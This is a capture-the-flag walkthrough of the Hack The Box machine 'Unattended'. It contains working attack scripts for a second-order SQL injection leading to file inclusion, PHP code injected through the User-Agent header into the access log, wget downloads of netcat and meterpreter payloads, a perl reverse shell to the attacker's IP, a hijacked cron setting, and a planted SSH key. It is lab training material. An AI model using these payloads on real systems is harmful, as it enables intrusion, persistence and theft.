Unattended - Hack The Box
Unattended was a pretty tough box with a second order SQL injection in the PHP app. By injecting PHP code into the web server access logs through the User-Agent header, I can get RCE by including the logs using the SQL injection. I didn’t quite understand what the priv esc was about though. I found the initrd archive and stumbled upon the contents by doing a grep on the box author’s name.
Summary
- Get the vhost from the SSL certificate information
- Enumerate the website to find that the only parameter that seems dynamic is the
idparameter - Run sqlmap against the site and find both a boolean-blind and time-based boolean injection in the
idparameter - Slowly dump what seems to be the most relevant tables:
config,idnamesandfilepath - Based on the information found, assume that the included page from PHP is the results of two SQL queries
- Construct a 2nd order SQL injection to get a LFI
- Inject PHP code in the NGINX
access.logand use the LFI to point to the code and get RCE - Obtain a PHP meterpreter by downloading a msfvenom payload through PHP
system()andwget - Find that we have write access in the
/var/lib/php/sessionsdirectory and drop a perl reverse shell there - Modify the table
config, change thecheckreleaseparameter to point to the reverse shell perl script - Wait for the cronjob to run and get a shell as
guly - Find that the server has an IPv6 address and that SSH is not firewalled on IPv6
- Check groups that
gulyis part of, find that he is part ofgrubwhich is not a standard Debian group - Look for files owned by group
grub, find/boot/initrd.img-4.9.0-8-amd64 - Download, unpack the file, find a
uinitrdbinary which is not standard in Debian - Search for box maker name (guly) in the unpacked files and find comment followed by
/sbin/uinitrd c0m3s3f0ss34nt4n1incryptorootfile - Can’t execute
uinitrdon the box because of permissions but we can upload our own copy and execute it from/home/guly - Output is 40 characters hex. By passing the
c0m3s3f0ss34nt4n1argument we get a different SHA1 output - The 40 characters hex string output is the root password and can
suroot with it
Portscan
There’s not much running on this box but I make note of the www.nestedflanders.htb SSL certificate name. I’ll add this to my /etc/hosts file as well as other subdomains like admin.*, dev.*, etc. in case I need them later.
# nmap -sC -sV -p- 10.10.10.126
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 19:01 EDT
Nmap scan report for 10.10.10.126
Host is up (0.0067s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 503 Service Temporarily Unavailable
443/tcp open ssl/http nginx 1.10.3
| ssl-cert: Subject: commonName=www.nestedflanders.htb
| Not valid before: 2018-12-19T09:43:58
|_Not valid after: 2021-09-13T09:43:58
Web site enumeration - Port 80
The default page on the Port 80 web server returns a single dot.
Nothing interesting is returned from gobuster so I won’t include the output here.
Web site enumeration - Port 443
The default apache page is shown here.
The response contains the X-Upstream: 127.0.0.1:8080 header which indicates that Nginx is probably fronting the HTTPS page and proxying back to Apache2 on the backend.
There’s also a index.php and /dev/ page which I found by running gobuster.
# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -k -t 10 -u https://www.nestedflanders.htb
/dev (Status: 301)
/index.php (Status: 200)
The /dev/ doesn’t have anything interesting. I check the vhost dev.nestedflanders.htb but that doesn’t seem valid and I get directed to the page with the single dot.
The index.php shows the followings pages that are included with the id parameter.
There’s nothing at first glance that seems dynamic other than the id parameter used to include pages. After manually trying other parameters, I find that the name parameter is used by the page to change the name displayed and is vulnerable to XSS. It’s a reflected XSS so I don’t see how this would be useful here. Moving on.
Finding the first SQL injection
Next, I run sqlmap on the page to see if I can find a SQL injection in the id parameter. I find that the database backend is MySQL and that the page contains two SQL injections: a boolean-based blind and time-based boolean injection. Originally when I first ran sqlmap with id=25 it only found that time-based blind injection but when I specified the id=587 it found both. I think this happens because the default page returned by index.php is the one from id 25, so the boolean-blind injection can only work with the other two pages.
# sqlmap -u https://www.nestedflanders.htb/index.php?id=587 -p id
[...]
sqlmap identified the following injection point(s) with a total of 288 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=587' AND 5533=5533 AND 'BkIC'='BkIC
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=587' AND SLEEP(5) AND 'kUKZ'='kUKZ
---
[00:51:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.12
The boolean-blind injection is faster to dump the database and is less susceptible to instability if other people are hammering the box. First I check the current database used, then dump the list of tables from database neddy:
# sqlmap -u https://www.nestedflanders.htb/index.php?id=587 --current-db
[...]
[00:54:27] [INFO] retrieved: neddy
current database: 'neddy'
# sqlmap -u https://www.nestedflanders.htb/index.php?id=587 --tables -D neddy
[...]
Database: neddy
[11 tables]
+--------------+
| config |
| customers |
| employees |
| filepath |
| idname |
| offices |
| orderdetails |
| orders |
| payments |
| productlines |
| products |
+--------------+
I’ll focus on config, idname and filepath tables first. The other tables contain a lot of rows and it would take too long to dump everything. I increase the thread count to make it a bit faster.
# sqlmap -u https://www.nestedflanders.htb/index.php?id=587 -T config,filepath,idname --technique B -D neddy --dump --threads 10
[...]
Table: config
+-----+-------------------------+--------------------------------------------------------------------------+
| id | option_name | option_value |
+-----+-------------------------+--------------------------------------------------------------------------+
| 54 | offline | 0 |
| 55 | offline_message | Site offline, please come back later |
| 56 | display_offline_message | 0 |
| 57 | offline_image | <blank> |
| 58 | sitename | NestedFlanders |
| 59 | editor | tinymce |
| 60 | captcha | 0 |
| 61 | list_limit | 20 |
| 62 | access | 1 |
| 63 | debug | 0 |
| 64 | debug_lang | 0 |
| 65 | dbtype | mysqli |
| 66 | host | localhost |
| 67 | live_site | <blank> |
| 68 | gzip | 0 |
| 69 | error_reporting | default |
| 70 | ftp_host | 127.0.0.1 |
| 71 | ftp_port | 21 |
| 72 | ftp_user | flanders |
| 73 | ftp_pass | 0e1aff658d8614fd0eac6705bb69fb684f6790299e4cf01e1b90b1a287a94ffcde451466 |
| 74 | ftp_root | / |
| 75 | ftp_enable | 1 |
| 76 | offset | UTC |
| 77 | mailonline | 1 |
| 78 | mailer | mail |
| 79 | mailfrom | nested@nestedflanders.htb |
| 80 | fromname | Neddy |
| 81 | sendmail | /usr/sbin/sendmail |
| 82 | smtpauth | 0 |
| 83 | smtpuser | <blank> |
| 84 | smtppass | <blank> |
| 85 | smtppass | <blank> |
| 86 | checkrelease | /home/guly/checkbase.pl;/home/guly/checkplugins.pl; |
| 87 | smtphost | localhost |
| 88 | smtpsecure | none |
| 89 | smtpport | 25 |
| 90 | caching | 0 |
| 91 | cache_handler | file |
| 92 | cachetime | 15 |
| 93 | MetaDesc | <blank> |
| 94 | MetaKeys | <blank> |
| 95 | MetaTitle | 1 |
| 96 | MetaAuthor | 1 |
| 97 | MetaVersion | 0 |
| 98 | robots | <blank> |
| 99 | sef | 1 |
| 100 | sef_rewrite | 0 |
| 101 | sef_suffix | 0 |
| 102 | unicodeslugs | 0 |
| 103 | feed_limit | 10 |
| 104 | lifetime | 1 |
| 105 | session_handler | file |
+-----+-------------------------+--------------------------------------------------------------------------+
[...]
Table: idname
+-----+-------------+----------+
| id | name | disabled |
+-----+-------------+----------+
| 1 | main.php | 1 |
| 2 | about.php | 1 |
| 3 | contact.php | 1 |
| 25 | main | 0 |
| 465 | about | 0 |
| 587 | contact | 0 |
+-----+-------------+----------+
[...]
Table: filepath
+---------+--------------------------------------+
| name | path |
+---------+--------------------------------------+
| about | 47c1ba4f7b1edf28ea0e2bb250717093.php |
| contact | 0f710bba8d16303a415266af8bb52fcb.php |
| main | 787c75233b93aa5e45c3f85d130bfbe7.php |
+---------+--------------------------------------+
[...]
Here are my observations for each of the table:
-
config: There’s a lot of data here, including some potential credentials inftp_pass. There’s also acheckreleaseoption that points to a perl script in/home/guly/ -
idname: That table contains the mapping between the ID specified in the GET request and a name -
filepath: The name from the previous table seems to be referenced here in this table
Second order SQL injection
I have the database table with some possible credentials but there’s nothing else open on this box except HTTP and HTTPS and I haven’t found any other hidden directory and/or vhost. There’s possibly a service listening on an IPv6 address but I don’t know the address and I can’t scan the entire /64 because that address space is too large to scan.
The MD5 hash of the last two entries in the filepath table are the md5sum of the strings submission and smtp. Thinking that this was a hint, I hashed a couple of wordlists and ran those through wfuzz but was unsuccesfull in finding any other files.
I don’t have the PHP source code but I can guess that there are two SQL queries being issued from index.php: one to map the ID to the name, and another one to map the name to the filename. If I can perform an injection on the first query, I can probably do the same on the second one and control which file gets included by the PHP code, basically getting an LFI.
I don’t like testing SQL injections within Burp so I made a script to help me with the process:
import readline
import requests
proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }
while True:
cmd = raw_input("> ")
payload = cmd
payload = payload + "-- -"
print payload
r = requests.get("https://www.nestedflanders.htb/index.php?id=%s" % payload, proxies=proxies, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
print soup.body
The first thing I test is to check if I can display the Contact page by returning contact instead of main from the first query against the idname table.
This is the query I want to run against the idname table: SELECT name FROM idname WHERE id = '25' UNION SELECT ALL 'contact'
Output from my script below:
# python sqli.py
> 25' union select all 'contact'
[...]
<body class="container">
Hello visitor,<br/>
thanks for getting in touch with us!<br/>
Unfortunately our server is under *heavy* attack and we disable almost every dynamic page.<br/>
Please come back later.
Ok, so that was successful and the Contact page was returned so the first injection worked. What I want to do now is inject another SQL injection in the name field returned instead of the actual name value so I can use the same UNION SELECT injection on the 2nd query and return a filename of my choosing.
This is the query I want to run against the filepath table: SELECT path FROM filepath WHERE name = 'invalid' UNION SELECT ALL '/etc/passwd'.
I made another script to do this:
from bs4 import BeautifulSoup
import readline
import requests
proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }
while True:
file = raw_input("> ")
payload = "25' union select all \"%s\" -- -" % ("invalid' union select all '" + file)
r = requests.get("https://www.nestedflanders.htb/index.php?id=%s" % payload, proxies=proxies, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
print soup.body
The 2nd query now returns a file name that I control and I can read files on the target system:
# python sqli3.py
> /etc/passwd
[...]
<!-- <div align="center"> -->
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
guly:x:1000:1000:guly,,,:/home/guly:/bin/bash
mysql:x:107:112:MySQL Server,,,:/nonexistent:/bin/false
Gaining RCE on the system through code PHP injection in the access logs
I have access to the nginx access logs and I can see that the User-Agent header is included in the logs:
> /var/log/nginx/access.log
10.10.14.23 - - [14/Apr/2019:21:31:24 -0400] "GET /index.php?id=25'%20union%20select%20all%20%22invalid'%20union%20select%20all%20'/etc/issue%22%20--%20- HTTP/1.1" 200 423 "-" "python-requests/2.18.4"
10.10.14.23 - - [14/Apr/2019:21:32:38 -0400] "GET /index.php?id=25'%20union%20select%20all%20%22invalid'%20union%20select%20all%20'/etc/passwd%22%20--%20- HTTP/1.1" 200 925 "-" "python-requests/2.18.4"
10.10.14.23 - - [14/Apr/2019:21:38:00 -0400] "GET /index.php?id=25'%20union%20select%20all%20%22invalid'%20union%20select%20all%20'/home/guly/user.txt%22%20--%20- HTTP/1.1" 200 398 "-" "python-requests/2.18.4"
I control the User-Agent header so I can potentially inject PHP code in the access logs and trigger it by making a request to the log file using the LFI from the SQL injection. After some trial and error I find that Iwe can inject any PHP code I want in the User-Agent header and that the system function is not disabled. To make sure I don’t end up with too much PHP statements in the access logs and kill the box, I reset the content of the access log file every time I run a command.
Here’s the script I made to execute commands. I could have put more regex in there to clean up the output a bit more but that’ll do for now.
#!/usr/bin/python
from bs4 import BeautifulSoup
import re
import readline
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }
while True:
cmd = raw_input("> ")
headers = { "User-Agent": "<?php system('echo **BEGIN** > /var/log/nginx/access.log; %s'); ?>**END**" % cmd}
r = requests.get("http://10.10.10.126/", headers=headers)
file = "/var/log/nginx/access.log"
payload = "25' union select all \"%s\" -- -" % ("invalid' union select all '" + file)
r = requests.get("https://www.nestedflanders.htb/index.php?id=%s" % payload, proxies=proxies, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
m = re.search("\*\*BEGIN\*\*(.*)\*\*END\*\*", str(soup.body), flags=re.DOTALL)
if m:
print m.group(1)
else:
print("No output")
I have RCE as www-data:
# python rce.py
> id
**
10.10.14.23 - - [14/Apr/2019:21:59:41 -0400] "GET / HTTP/1.1" 200 2 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
Python and netcat are not installed on this box. I tried using perl to spawn a shell but I kept killing the box (bad code injected in the access log? so I tried downloading netcat and spawn a shell that way.
> wget http://10.10.14.23/nc -O /tmp/nc
> chmod 777 /tmp/nc
> ls -l /tmp/nc
10.10.14.23 - - [14/Apr/2019:22:08:26 -0400] "GET / HTTP/1.1" 200 2 "-" "-rwxrwxrwx 1 www-data www-data 442856 Apr 14 14:22 /tmp/nc
> /tmp/nc -e /bin/sh 10.10.14.23 80
[No output!]
I download netcat on the box but I don’t get any callback when I try to execute it. When I look at the filesystem mounts I see that the temporary locations are all mounted as noexec so I can’t run any binary that I upload there.
> mount
**
10.10.14.23 - - [14/Apr/2019:22:00:14 -0400] "GET / HTTP/1.1" 200 2 "-" "/dev/mapper/sda2_crypt on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,noexec)
[...]
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /var/tmp type tmpfs (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /boot type ext2 (rw,relatime,block_validity,barrier,user_xattr,acl)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /var/tmp type tmpfs (rw,nosuid,nodev,noexec,relatime)
First shell using Metasploit
If I upload a PHP meterpreter payload into /tmp I can execute it since the php binary is in the main partition that is executable.
> wget http://10.10.14.23:443/snowscan.php -O /tmp/snowscan.php
> php /tmp/snowscan.php
I get a meterpreter session a few seconds after.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.23:80
[*] Encoded stage with php/base64
[*] Sending encoded stage (51106 bytes) to 10.10.10.126
[*] Meterpreter session 1 opened (10.10.14.23:80 -> 10.10.10.126:47394) at 2019-04-15 02:18:34 -0400
msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: www-data (33)
The first thing I do once I have a shell is check if I can access user.txt but the /home/guly directory isn’t readble by www-data. Next I grab the MySQL credentials from /var/www/html/index.php:
$servername = "localhost";
$username = "nestedflanders";
$password = "1036913cf7d38d4ea4f79b050f171e9fbf3f5e";
$db = "neddy";
$conn = new mysqli($servername, $username, $password, $db);
I don’t have an interactive TTY so I have to issue queries directly from the shell.
mysql -u nestedflanders -p1036913cf7d38d4ea4f79b050f171e9fbf3f5e -e "show tables" neddy
Tables_in_neddy
config
customers
employees
filepath
idname
offices
orderdetails
orders
payments
productlines
products
Escalating to a new shell as user guly
I thought about that checkrelease parameter in the config table I saw earlier. It currently contains /home/guly/checkbase.pl;/home/guly/checkplugins.pl; so I guess that this may be a script running at specific interval. I have access to the database so I can change this value.
I use the standard perl reverse shell payload, then drop it into /var/lib/php/sessions since it’s the only directory in the main executable partition I have write access to:
use Socket;$i="10.10.14.23";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
wget http://10.10.14.23:443/shell.pl -O /var/lib/php/sessions/shell.pl
--2019-04-14 22:25:39-- http://10.10.14.23:443/shell.pl
Connecting to 10.10.14.23:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 209 [text/x-perl]
Saving to: '/var/lib/php/sessions/shell.pl'
Then I update the database configuration to point to the new script:
mysql -u nestedflanders -p1036913cf7d38d4ea4f79b050f171e9fbf3f5e -e "update config set option_value = '/usr/bin/perl /var/lib/php/sessions/shell.pl;' where id='86'" neddy
mysql -u nestedflanders -p1036913cf7d38d4ea4f79b050f171e9fbf3f5e -e "select * from config where id='86'" neddy
id option_name option_value
86 checkrelease /usr/bin/perl /var/lib/php/sessions/shell.pl;
After a minute or two I get a connection back:
root@ragingunicorn:~/htb/unattended# nc -lvnp 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.126.
Ncat: Connection from 10.10.10.126:47400.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),47(grub),108(netdev)
$ cat user.txt
9b413f...
IPv6 is configured on this server so I will run an nmap scan against the IPv6 address to see if I can find any other open port.
$ ip a
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b2:7b:c2 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.126/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb2:7bc2/64 scope global mngtmpaddr dynamic
valid_lft 86215sec preferred_lft 14215sec
inet6 fe80::250:56ff:feb2:7bc2/64 scope link
valid_lft forever preferred_lft forever
As expected, I find SSH listening:
# nmap -6 -p- dead:beef::250:56ff:feb2:7bc2
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-15 02:34 EDT
Nmap scan report for dead:beef::250:56ff:feb2:7bc2
Host is up (0.0081s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 11.48 seconds
I’ll add my SSH public keys to guly’s SSH directory so I can log back in later:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+SZ75RsfVTQxRRbezIJn+bQgNifXvjMWfhT1hJzl/GbTbykFtGPTwuiA5NAcPKPG25jkQln3J8Id2ngapRuW8i8OvM+QBuihsM9wLxu+my0JhS/aNHTvzJF0uN1XkvZj/BkbjUpsF9k6aMDaFoaxaKBa7ST2ZFpxlbu2ndmoB+HuvmeTaCmoY/PsxgDBWwd3GiRNts2HOiu74DEVt0hHbJ7kwhkR+l0+6VS74s+7SjP+N1q+oih83bjwM8ph+9odqAbh6TGDTbPX2I+3lTzCUeGS9goKZe05h/YtB2U2VbH1pxJZ1rfR1Sp+SBS+zblO9MUxvbzQoJTHpH2jeDg89 root@ragingunicorn" > .ssh/authorized_keys
From here I will use the SSH shell instead so I have a TTY:
root@ragingunicorn:~# ssh guly@dead:beef::250:56ff:feb2:7bc2
guly@unattended:~$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),47(grub),108(netdev)
Priv esc
I check the groups that guly is a member of and the grub group seems suspicious to me. According to https://wiki.debian.org/SystemGroups this isn’t a standard group.
I’ll do a search for files owned by the grub group and find a single file: /boot/initrd.img-4.9.0-8-amd64
guly@unattended:~$ find / -group grub 2>/dev/null
/boot/initrd.img-4.9.0-8-amd64
I download the file to my Kali VM:
# scp -6 guly@\[dead:beef::250:56ff:feb2:7bc2\]:/boot/initrd.img-4.9.0-8-amd64 .
initrd.img-4.9.0-8-amd64
# file initrd.img-4.9.0-8-amd64
initrd.img-4.9.0-8-amd64: gzip compressed data, last modified: Thu Dec 20 22:50:39 2018, from Unix, original size 62110208
This is a compressed file, I’ll gunzip it first:
# mv initrd.img-4.9.0-8-amd64 initrd.img-4.9.0-8-amd64.gz
# gunzip initrd.img-4.9.0-8-amd64.gz
# file initrd.img-4.9.0-8-amd64
initrd.img-4.9.0-8-amd64: ASCII cpio archive (SVR4 with no CRC)
Then unpack the cpio archive in a separate folder:
# mv initrd.img-4.9.0-8-amd64 tmp
root@ragingunicorn:~/htb/unattended/tmp# cpio -i < initrd.img-4.9.0-8-amd64
121309 blocks
root@ragingunicorn:~/htb/unattended/tmp# ls -l
total 60704
drwxr-xr-x 2 root root 4096 Apr 15 02:42 bin
drwxr-xr-x 2 root root 4096 Apr 15 02:42 boot
drwxr-xr-x 3 root root 4096 Apr 15 02:42 conf
drwxr-xr-x 5 root root 4096 Apr 15 02:42 etc
-rwxr-xr-x 1 root root 5960 Apr 15 02:42 init
-rw-r----- 1 root root 62110208 Apr 15 02:40 initrd.img-4.9.0-8-amd64
drwxr-xr-x 8 root root 4096 Apr 15 02:42 lib
drwxr-xr-x 2 root root 4096 Apr 15 02:42 lib64
drwxr-xr-x 2 root root 4096 Apr 15 02:42 run
drwxr-xr-x 2 root root 4096 Apr 15 02:42 sbin
drwxr-xr-x 8 root root 4096 Apr 15 02:42 scripts
There’s a lot of files in there and nothing standards out at first. Doing a search for guly (the box creator name) I find an interesting file:
root@ragingunicorn:~/htb/unattended/tmp# grep -r -A 5 -B 5 guly *
Binary file initrd.img-4.9.0-8-amd64 matches
--
scripts/local-top/cryptroot- fi
scripts/local-top/cryptroot- fi
scripts/local-top/cryptroot-
scripts/local-top/cryptroot-
scripts/local-top/cryptroot- if [ ! -e "$NEWROOT" ]; then
scripts/local-top/cryptroot: # guly: we have to deal with lukfs password sync when root changes her one
scripts/local-top/cryptroot- if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
scripts/local-top/cryptroot- /sbin/uinitrd c0m3s3f0ss34nt4n1 | $cryptopen ; then
scripts/local-top/cryptroot- message "cryptsetup: cryptsetup failed, bad password or options?"
scripts/local-top/cryptroot- sleep 3
scripts/local-top/cryptroot- continue
The /sbin/uinitrd c0m3s3f0ss34nt4n1 entry is very peculiar. If I do a google search on c0m3s3f0ss34nt4n1 I don’t find anything so I assume this has been created or modified on purpose. I can’t find any man file for uinitrd and googling doesn’t find anything conclusive. I was expecting to find this is a standard Linux command but it doesn’t seem to be the case.
Also, c0m3s3f0ss34nt4n1 = comesefosseantani and the box creator is Italian…
I don’t have access to run this on the box itself:
guly@unattended:~$ /sbin/uinitrd
-bash: /sbin/uinitrd: Permission denied
guly@unattended:~$ ls -l /sbin/uinitrd
-rwxr-x--- 1 root root 933240 Dec 20 16:50 /sbin/uinitrd
Running it locally on my VM I get more Italian:
# ./uinitrd
supercazzola
Let’s see what happens if I upload my copy to the server and execute it:
root@ragingunicorn:~/htb/unattended# scp -6 tmp/sbin/uinitrd guly@\[dead:beef::250:56ff:feb2:7bc2\]:unitrd
uinitrd
I get some SHA-1 output when I run the binary. The output changes depending on the string I pass as argument:
guly@unattended:~$ ./unitrd
c26625fb20563604795b161c6f64b41539e3ec63
guly@unattended:~$ ./unitrd 123
772fdeb165b85e3f395b903c57014f4c6c0ab133
guly@unattended:~$ ./unitrd 123456
d98e9572902fce6c98942ffab1bbd3a6d51ff31c
guly@unattended:~$ ./unitrd 123456
d98e9572902fce6c98942ffab1bbd3a6d51ff31c
Those look like SHA1 hashes but I don’t know what they mean. I try the first one as the root password but it doesn’t work.
However when I run the program with the c0m3s3f0ss34nt4n1 argument, I am able to su as root with the hash I got:
guly@unattended:~$ ./unitrd c0m3s3f0ss34nt4n1
132f93ab100671dcb263acaf5dc95d8260e8b7c6
guly@unattended:~$ su -
Password:
root@unattended:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unattended:~# cat root.txt
559c0e...